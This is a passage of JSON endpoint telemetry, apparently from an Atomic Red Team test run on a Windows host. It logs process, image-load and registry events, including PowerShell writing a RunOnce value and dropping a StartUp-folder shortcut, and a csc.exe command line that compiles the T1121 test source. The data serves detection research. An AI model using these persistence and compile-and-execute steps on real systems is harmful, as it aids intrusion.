"pid": 1688, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570854490000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010460E4D01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1688, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570854490000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010460E4D01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 1688, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570854650000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010460E4D01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 1688, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570854650000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010460E4D01}" - }, - { - "event_type": "process", - "pid": 1688, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883570854650000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010460E4D01}" - }, - { - "event_type": "registry", - "pid": 7036, - "process_name": "powershell.exe", - "process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\NextRun", - "registry_value": "NextRun", - "timestamp": 131883570855110000, - "unique_pid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}" - }, - { - "event_type": "registry", - "pid": 7036, - "process_name": "powershell.exe", - "process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\NextRun", - "registry_value": "NextRun", - "timestamp": 131883570855270000, - "unique_pid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}" - }, - { - "event_type": "file", - "file_name": "Notepad.lnk", - "file_path": "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\Notepad.lnk", - "pid": 7036, - "process_name": "powershell.exe", - "process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "timestamp": 131883570856830000, - "unique_pid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll /target:library C:\\AtomicRedTeam\\atomics\\T1121\\src\\T1121.cs\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 4760, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883570858150000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00108A214D01}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4760, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570858080000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00108A214D01}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4760, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570858080000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00108A214D01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4760, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570858080000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00108A214D01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4760, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570858080000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00108A214D01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4760, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570858080000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00108A214D01}" - }, - { - "command_line": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll /target:library C:\\AtomicRedTeam\\atomics\\T1121\\src\\T1121.cs", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3592, - "ppid": 4760, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "subtype": "create", - "timestamp": 131883570858230000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}", - "unique_ppid": "{42FC7E13-CADD-5C05-0000-00108A214D01}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3592, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570858400000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570858400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570858550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570858550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570858550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570858550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570858550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570858550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570858550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570858550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570858550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570858550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570858550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570858550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570858550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570858550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570858550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570858550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570858550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570858550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570858550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570858550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570858550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570858550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570858550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "csc.exe", - "image_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "pid": 3592, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570858400000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570858550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3592, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570858550000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\SysWOW64\\ntdll.dll", - "pid": 3592, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570858550000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570858710000, - "unique_pid": 